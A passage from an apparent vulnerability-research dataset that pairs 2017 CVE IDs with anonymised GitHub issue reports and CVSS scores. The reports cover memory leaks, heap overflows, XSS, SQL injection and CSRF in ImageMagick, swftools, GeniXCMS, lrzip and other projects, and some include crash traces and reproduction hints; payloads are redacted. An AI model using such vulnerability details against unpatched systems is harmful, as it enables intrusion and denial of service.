a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14726. "severity": "MEDIUM",
  14727. "baseScore": 6.5,
  14728. "impactScore": 3.6,
  14729. "exploitabilityScore": 2.8
  14730. },
  14731. {
  14732. "CVE_ID": "CVE-2017-8354",
  14733. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/451",
  14734. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/451",
  14735. "Repo_new": "imagemagick/imagemagick",
  14736. "Issue_Created_At": "2017-04-26T16:48:51Z",
  14737. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8cd NUMBERTAG b6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f8ccb6c5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14739. "severity": "MEDIUM",
  14740. "baseScore": 6.5,
  14741. "impactScore": 3.6,
  14742. "exploitabilityScore": 2.8
  14743. },
  14744. {
  14745. "CVE_ID": "CVE-2017-8355",
  14746. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/450",
  14747. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/450",
  14748. "Repo_new": "imagemagick/imagemagick",
  14749. "Issue_Created_At": "2017-04-26T16:47:58Z",
  14750. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ff0d0 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14752. "severity": "MEDIUM",
  14753. "baseScore": 6.5,
  14754. "impactScore": 3.6,
  14755. "exploitabilityScore": 2.8
  14756. },
  14757. {
  14758. "CVE_ID": "CVE-2017-8356",
  14759. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/449",
  14760. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/449",
  14761. "Repo_new": "imagemagick/imagemagick",
  14762. "Issue_Created_At": "2017-04-26T16:47:10Z",
  14763. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG c1b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG bc2e in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG bdad0b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14765. "severity": "MEDIUM",
  14766. "baseScore": 6.5,
  14767. "impactScore": 3.6,
  14768. "exploitabilityScore": 2.8
  14769. },
  14770. {
  14771. "CVE_ID": "CVE-2017-8357",
  14772. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/453",
  14773. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/453",
  14774. "Repo_new": "imagemagick/imagemagick",
  14775. "Issue_Created_At": "2017-04-26T16:50:06Z",
  14776. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG cc1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14778. "severity": "MEDIUM",
  14779. "baseScore": 6.5,
  14780. "impactScore": 3.6,
  14781. "exploitabilityScore": 2.8
  14782. },
  14783. {
  14784. "CVE_ID": "CVE-2017-8368",
  14785. "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/1700",
  14786. "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/1700",
  14787. "Repo_new": "sublimehq/sublime_text",
  14788. "Issue_Created_At": "2017-05-01T17:00:58Z",
  14789. "description": "A Denial of Service Vulnerablity( CVETAG ) in Sublime Text NUMBERTAG Build NUMBERTAG I found this vulnerablity and you should fix it. The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVETAG to this issue. Summary Sublime Text NUMBERTAG Build NUMBERTAG might allow user assisted attackers to execute code via a crafted file. Expected behavior Follow the commands in APITAG to reproduce\" Actual behavior Crash Steps to reproduce Details and Proof of Concept will be sent by a proper contact way if you can provide it for me but these will not be post here since it is Not fixed yet. Environment Windows NUMBERTAG Sublime Text: Build NUMBERTAG",
  14790. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14791. "severity": "HIGH",
  14792. "baseScore": 7.8,
  14793. "impactScore": 5.9,
  14794. "exploitabilityScore": 1.8
  14795. },
  14796. {
  14797. "CVE_ID": "CVE-2017-8376",
  14798. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/72",
  14799. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/72",
  14800. "Repo_new": "semplon/genixcms",
  14801. "Issue_Created_At": "2017-04-25T03:53:19Z",
  14802. "description": "SQL Injection in version NUMBERTAG I find a SQL injection at PATHTAG line NUMBERTAG APITAG Go URLTAG , find a menus and click del button. Change the position of menuid and token, change menuid into : APITAG exp: APITAG FILETAG BTW: could i request this for a CVE?",
  14803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14804. "severity": "MEDIUM",
  14805. "baseScore": 5.4,
  14806. "impactScore": 2.7,
  14807. "exploitabilityScore": 2.3
  14808. },
  14809. {
  14810. "CVE_ID": "CVE-2017-8382",
  14811. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/612",
  14812. "Issue_Url_new": "https://github.com/admidio/admidio/issues/612",
  14813. "Repo_new": "admidio/admidio",
  14814. "Issue_Created_At": "2017-05-15T10:06:19Z",
  14815. "description": "CSRF in Admidio NUMBERTAG Hello, I would like to report a vulnerability that I have found on Admidio NUMBERTAG in which Cross Site Request Forgery (CSRF) attack is possible. For details please go through attached document. FILETAG Regards, Faiz Ahmed Zaidi",
  14816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H",
  14817. "severity": "MEDIUM",
  14818. "baseScore": 4.5,
  14819. "impactScore": 3.6,
  14820. "exploitabilityScore": 0.9
  14821. },
  14822. {
  14823. "CVE_ID": "CVE-2017-8400",
  14824. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/13",
  14825. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/13",
  14826. "Repo_new": "matthiaskramm/swftools",
  14827. "Issue_Created_At": "2017-04-26T13:02:19Z",
  14828. "description": "Segmentation Fault:out of bound write of heap data issue can occur in function APITAG Recently, I found an out of bound issue in the newest branch of swftools which can cause the segmentation fault. This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result n APITAG and might cause arbitrary code execution. The crash infomation is as follows. compiled normally $ analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 fsanitize=address\u2019 $ analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a3fa bp NUMBERTAG fffe NUMBERTAG sp NUMBERTAG fffe NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a3f9 in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f NUMBERTAG a8c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb6a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the zip package of APITAG and a brief analysis. APITAG APITAG",
  14829. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14830. "severity": "HIGH",
  14831. "baseScore": 8.8,
  14832. "impactScore": 5.9,
  14833. "exploitabilityScore": 2.8
  14834. },
  14835. {
  14836. "CVE_ID": "CVE-2017-8401",
  14837. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/14",
  14838. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/14",
  14839. "Repo_new": "matthiaskramm/swftools",
  14840. "Issue_Created_At": "2017-04-26T15:53:51Z",
  14841. "description": "Segmentation Fault:An out of bound read of heap data issue can occur in function APITAG An out of bound read of heap data issue can occur in function APITAG This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result in APITAG compiled normally \u279c analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 APITAG \u279c analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG c bp NUMBERTAG ffdf NUMBERTAG becc0 sp NUMBERTAG ffdf NUMBERTAG becb0 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG b in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f5fefa8e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f5ff NUMBERTAG in malloc ( PATHTAG NUMBERTAG bd in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the APITAG and a brief report. APITAG APITAG",
  14842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14843. "severity": "MEDIUM",
  14844. "baseScore": 6.5,
  14845. "impactScore": 3.6,
  14846. "exploitabilityScore": 2.8
  14847. },
  14848. {
  14849. "CVE_ID": "CVE-2017-8418",
  14850. "Issue_Url_old": "https://github.com/bbatsov/rubocop/issues/4336",
  14851. "Issue_Url_new": "https://github.com/rubocop/rubocop/issues/4336",
  14852. "Repo_new": "rubocop/rubocop",
  14853. "Issue_Created_At": "2017-05-01T16:33:53Z",
  14854. "description": "Insecure use of /tmp. Actual behavior APITAG uses APITAG to store cache files insecurely. Malicious local users could exploit this to tamper with cache files belonging to other users. Expected behavior APITAG should not abuse APITAG for cache. Please consider adopting FILETAG , which says cache should be stored in APITAG or APITAG . Steps to reproduce the problem Proof of concept exploit: ERRORTAG APITAG version NUMBERTAG using Parser NUMBERTAG running on ruby NUMBERTAG i NUMBERTAG linux gnu)",
  14855. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  14856. "severity": "LOW",
  14857. "baseScore": 3.3,
  14858. "impactScore": 1.4,
  14859. "exploitabilityScore": 1.8
  14860. },
  14861. {
  14862. "CVE_ID": "CVE-2017-8458",
  14863. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/4748",
  14864. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/4748",
  14865. "Repo_new": "brave/browser-laptop",
  14866. "Issue_Created_At": "2016-10-13T19:30:20Z",
  14867. "description": "APITAG report: URL obfuscation. URLTAG Verified on OS NUMBERTAG Steps to Reproduce NUMBERTAG go to FILETAG NUMBERTAG urlbar makes it look like we are at brave.com when the page displayed is example.com Expected behavior urlbar should show the actual page location, which is FILETAG",
  14868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  14869. "severity": "MEDIUM",
  14870. "baseScore": 6.5,
  14871. "impactScore": 3.6,
  14872. "exploitabilityScore": 2.8
  14873. },
  14874. {
  14875. "CVE_ID": "CVE-2017-8762",
  14876. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/73",
  14877. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/73",
  14878. "Repo_new": "semplon/genixcms",
  14879. "Issue_Created_At": "2017-05-03T18:38:11Z",
  14880. "description": "XSS in APITAG NUMBERTAG latest). Register a user and submit a page, which contents xss payload APITAG APITAG When the administrator into the background to view this page, XSS will take effect. APITAG",
  14881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14882. "severity": "MEDIUM",
  14883. "baseScore": 5.4,
  14884. "impactScore": 2.7,
  14885. "exploitabilityScore": 2.3
  14886. },
  14887. {
  14888. "CVE_ID": "CVE-2017-8763",
  14889. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/182",
  14890. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/182",
  14891. "Repo_new": "Telaxus/EPESI",
  14892. "Issue_Created_At": "2017-05-02T11:03:08Z",
  14893. "description": "Cross Site Scripting . file: FILETAG code: APITAG poc: APITAG FILETAG",
  14894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14895. "severity": "MEDIUM",
  14896. "baseScore": 6.1,
  14897. "impactScore": 2.7,
  14898. "exploitabilityScore": 2.8
  14899. },
  14900. {
  14901. "CVE_ID": "CVE-2017-8765",
  14902. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/466",
  14903. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/466",
  14904. "Repo_new": "imagemagick/imagemagick",
  14905. "Issue_Created_At": "2017-05-03T08:36:29Z",
  14906. "description": "memory leak in APITAG APITAG NUMBERTAG magick identify $FILE When identify icon file, imagemagick will allocate memory to store colormap in function APITAG in coders\\icon.c, line NUMBERTAG if APITAG >colors,exception) == APITAG image >colors can be controlled, as it is assigned as follow(line NUMBERTAG if APITAG NUMBERTAG APITAG APITAG APITAG image APITAG //can be controlled if (image >colors NUMBERTAG image >colors=one << APITAG } APITAG is diretly from icon file without checking( line NUMBERTAG APITAG //can be controlled by modify icon file So, modifying the number_colors can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: Credit: APITAG of Venustech",
  14907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14908. "severity": "MEDIUM",
  14909. "baseScore": 6.5,
  14910. "impactScore": 3.6,
  14911. "exploitabilityScore": 2.8
  14912. },
  14913. {
  14914. "CVE_ID": "CVE-2017-8780",
  14915. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/74",
  14916. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/74",
  14917. "Repo_new": "semplon/genixcms",
  14918. "Issue_Created_At": "2017-05-04T05:21:59Z",
  14919. "description": "Comment XSS. Leave a comment with payload: APITAG aaaa</p if admin publish this comment, it will effect.",
  14920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  14921. "severity": "MEDIUM",
  14922. "baseScore": 4.8,
  14923. "impactScore": 2.7,
  14924. "exploitabilityScore": 1.7
  14925. },
  14926. {
  14927. "CVE_ID": "CVE-2017-8799",
  14928. "Issue_Url_old": "https://github.com/irods/irods/issues/3452",
  14929. "Issue_Url_new": "https://github.com/irods/irods/issues/3452",
  14930. "Repo_new": "irods/irods",
  14931. "Issue_Created_At": "2017-01-20T18:54:36Z",
  14932. "description": "igetwild bash cleanup.",
  14933. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14934. "severity": "CRITICAL",
  14935. "baseScore": 9.8,
  14936. "impactScore": 5.9,
  14937. "exploitabilityScore": 3.9
  14938. },
  14939. {
  14940. "CVE_ID": "CVE-2017-8825",
  14941. "Issue_Url_old": "https://github.com/dinhviethoa/libetpan/issues/274",
  14942. "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/274",
  14943. "Repo_new": "dinhvh/libetpan",
  14944. "Issue_Created_At": "2017-04-28T15:47:20Z",
  14945. "description": "Segmentation faults in mime handling. Hello, I was using American Fuzzy Lop (afl fuzz) to fuzz input to the mime parse test program. Is fixing these crashes something you're interested in? The input files can be found here: URLTAG The files can be executed as APITAG to cause seg faults. Let me know if I can provide any more information to help narrow down this issue.",
  14946. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14947. "severity": "HIGH",
  14948. "baseScore": 7.5,
  14949. "impactScore": 3.6,
  14950. "exploitabilityScore": 3.9
  14951. },
  14952. {
  14953. "CVE_ID": "CVE-2017-8827",
  14954. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/75",
  14955. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/75",
  14956. "Repo_new": "semplon/genixcms",
  14957. "Issue_Created_At": "2017-05-05T09:39:05Z",
  14958. "description": "Arbitrary User Password Reset Vulnerability. FILETAG DOES NOT limits the frequency users submit the password resetting form, If an attacker sends the request consecutively in a specific time, the target user will be unable to log into his account as his password is changed frequently. POST FILETAG APITAG",
  14959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  14960. "severity": "CRITICAL",
  14961. "baseScore": 9.1,
  14962. "impactScore": 5.2,
  14963. "exploitabilityScore": 3.9
  14964. },
  14965. {
  14966. "CVE_ID": "CVE-2017-8830",
  14967. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/467",
  14968. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/467",
  14969. "Repo_new": "imagemagick/imagemagick",
  14970. "Issue_Created_At": "2017-05-03T10:52:09Z",
  14971. "description": "memory leak in APITAG APITAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG URLTAG Author: bird APITAG",
  14972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14973. "severity": "MEDIUM",
  14974. "baseScore": 6.5,
  14975. "impactScore": 3.6,
  14976. "exploitabilityScore": 2.8
  14977. },
  14978. {
  14979. "CVE_ID": "CVE-2017-8833",
  14980. "Issue_Url_old": "https://github.com/zencart/zencart/issues/1431",
  14981. "Issue_Url_new": "https://github.com/zencart/zencart/issues/1431",
  14982. "Repo_new": "zencart/zencart",
  14983. "Issue_Created_At": "2017-05-07T11:23:09Z",
  14984. "description": "Version NUMBERTAG ersion NUMBERTAG Hi, I'm in your NUMBERTAG ersion open source found to FILETAG this page parameter value ID does not filter in the output or filter or escape the input character to cause XSS Poc Payload\uff1a URLTAG Resolving: Filtering encoding or escaping FILETAG FILETAG FILETAG",
  14985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14986. "severity": "MEDIUM",
  14987. "baseScore": 6.1,
  14988. "impactScore": 2.7,
  14989. "exploitabilityScore": 2.8
  14990. },
  14991. {
  14992. "CVE_ID": "CVE-2017-8842",
  14993. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/66",
  14994. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/66",
  14995. "Repo_new": "ckolivas/lrzip",
  14996. "Issue_Created_At": "2017-03-24T15:44:45Z",
  14997. "description": "divide by zero in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14998. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14999. "severity": "MEDIUM",
  15000. "baseScore": 5.5,
  15001. "impactScore": 3.6,
  15002. "exploitabilityScore": 1.8
  15003. },
  15004. {
  15005. "CVE_ID": "CVE-2017-8843",
  15006. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/69",
  15007. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/69",
  15008. "Repo_new": "ckolivas/lrzip",
  15009. "Issue_Created_At": "2017-03-24T15:56:13Z",
  15010. "description": "NULL pointer dereference in join_pthread (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15011. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15012. "severity": "MEDIUM",
  15013. "baseScore": 5.5,
  15014. "impactScore": 3.6,
  15015. "exploitabilityScore": 1.8
  15016. },
  15017. {
  15018. "CVE_ID": "CVE-2017-8844",
  15019. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/70",
  15020. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/70",
  15021. "Repo_new": "ckolivas/lrzip",
  15022. "Issue_Created_At": "2017-03-24T16:08:35Z",
  15023. "description": "heap based buffer overflow write in read NUMBERTAG g (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15024. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15025. "severity": "HIGH",
  15026. "baseScore": 7.8,
  15027. "impactScore": 5.9,
  15028. "exploitabilityScore": 1.8
  15029. },
  15030. {
  15031. "CVE_ID": "CVE-2017-8845",
  15032. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/68",
  15033. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/68",
  15034. "Repo_new": "ckolivas/lrzip",
  15035. "Issue_Created_At": "2017-03-24T15:51:37Z",
  15036. "description": "invalid memory read in lzo1x_decompress APITAG On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15038. "severity": "MEDIUM",
  15039. "baseScore": 5.5,
  15040. "impactScore": 3.6,
  15041. "exploitabilityScore": 1.8
  15042. },
  15043. {
  15044. "CVE_ID": "CVE-2017-8846",
  15045. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/71",
  15046. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/71",
  15047. "Repo_new": "ckolivas/lrzip",
  15048. "Issue_Created_At": "2017-03-24T16:10:33Z",
  15049. "description": "use after free in read_stream (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15050. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15051. "severity": "MEDIUM",
  15052. "baseScore": 5.5,
  15053. "impactScore": 3.6,
